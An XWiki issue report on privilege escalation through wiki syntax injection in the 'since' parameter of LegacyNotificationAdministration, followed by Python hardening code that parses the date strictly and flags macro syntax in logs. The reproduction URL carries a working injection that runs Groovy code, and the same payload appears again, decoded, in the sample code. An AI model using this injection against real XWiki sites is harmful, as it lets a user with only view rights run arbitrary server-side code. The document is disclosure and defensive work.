
Privilege escalation (PR) from view right on XWiki.Notifications.Code.LegacyNotificationAdministration



    Description

      Steps to reproduce:

      Open <xwiki-host>/xwiki/bin/view/XWiki/Notifications/Code/LegacyNotificationAdministration?since=%7B%7B%2Fhtml%7D%7D+%7B%7Basync+async%3D%22true%22+cached%3D%22false%22+context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello+%22+%2B+%22from+groovy%21%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D, where <xwiki-host> is the URL of your XWiki installation.

      Expected result:

      The document displays as if it was opened without a parameter, as the passed value isn't a valid date.

      Actual result:

      Failed to execute the [html] macro. Cause: [When using HTML content inline, you can only use inline HTML content. Block HTML content (such as tables) cannot be displayed. Try leaving an empty line before and after the macro.]. Click on this message for details.
      Hello from groovy!"
      

      is displayed, followed by raw HTML code. This demonstrates an XWiki syntax injection attack via the since-parameter, allowing privilege escalation from view to programming rights.

      This document has been freshly introduced in XWiki 14.6 as part of XWIKI-19826, but the same code previously existed in a template of the distribution wizard. This can be exploited similarly to the steps detailed in XWIKI-19852 via the template macro, either via the user account or via CKEditor's HTMLConverter, or directly via xpart.vm as shown in XWIKI-19558 before this issue had been fixed (XWiki versions before 13.10.5 and 14.3-rc-1).
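      The defensive pattern this report implies, written here as an added Python illustration rather than XWiki's own Velocity or Java code: a request parameter that is meant to be a date is parsed strictly, a valid value is re-serialised from the parsed object, and anything that fails to parse is treated as "no parameter", so untrusted text never reaches the rendering engine as wiki markup. The ISO 8601 format for `since` is an assumption (the report does not state the expected format); the decoded sample value is the one quoted in the reproduction URL above, and the macro pattern is only a logging aid.

```python
"""Illustrative hardening for an untrusted date parameter (added example; not XWiki code).

The report describes a `since` request parameter that is inserted into wiki
markup without validation, so a value that is not a date is parsed as XWiki
syntax and its macros execute.  The rule shown here: parse the parameter
strictly as a date and fall back to "no parameter" on any failure.
"""
import re
from datetime import datetime
from typing import Optional
from urllib.parse import unquote_plus

# The `since` value quoted in the report, URL-decoded so it can be inspected.
REPORTED_SINCE = unquote_plus(
    "%7B%7B%2Fhtml%7D%7D+%7B%7Basync+async%3D%22true%22+cached%3D%22false%22"
    "+context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello+%22"
    "+%2B+%22from+groovy%21%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D"
)

# XWiki macro syntax is {{name ...}} ... {{/name}}.  This pattern is a
# detection aid for request logs only; it is never the access decision.
MACRO_PATTERN = re.compile(r"\{\{/?[A-Za-z][\w-]*[^}]*\}\}")


def parse_since(raw: Optional[str]) -> Optional[datetime]:
    """Strictly parse `since` as an ISO 8601 timestamp (assumed format)."""
    if raw is None or not raw.strip():
        return None
    try:
        return datetime.fromisoformat(raw.strip())
    except ValueError:
        return None


def contains_macro_syntax(raw: str) -> bool:
    """Detection helper: does the raw parameter carry wiki macro markers?"""
    return MACRO_PATTERN.search(raw) is not None


def build_since_markup(raw: Optional[str]) -> str:
    """Return the fragment to embed in the page.

    A valid date is re-serialised from the parsed object, so only characters
    this code produced reach the renderer.  Anything else yields an empty
    fragment, i.e. the page behaves as if `since` had not been supplied,
    which is the "expected result" the report describes.
    """
    parsed = parse_since(raw)
    if parsed is None:
        return ""
    return f"since={parsed.isoformat()}"


def handle_request(params: dict) -> dict:
    """Decide how to treat the `since` parameter and flag suspicious input for logging."""
    raw = params.get("since")
    return {
        "markup": build_since_markup(raw),
        "accepted": parse_since(raw) is not None,
        "suspicious": bool(raw) and contains_macro_syntax(raw),
    }


if __name__ == "__main__":
    # Constructed inputs: a well-formed date, the reported value, and junk.
    for value in ("2023-01-15T10:00:00", REPORTED_SINCE, "not a date"):
        print(handle_request({"since": value}))
```

The key design choice is that the renderer only ever sees output of `isoformat()`, never the caller's bytes; `contains_macro_syntax` exists so that rejected requests carrying macro markers can be logged and alerted on, not so that a blocklist does the security work.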


          People

            tmortagne Thomas Mortagne
            MichaelHamann Michael Hamann
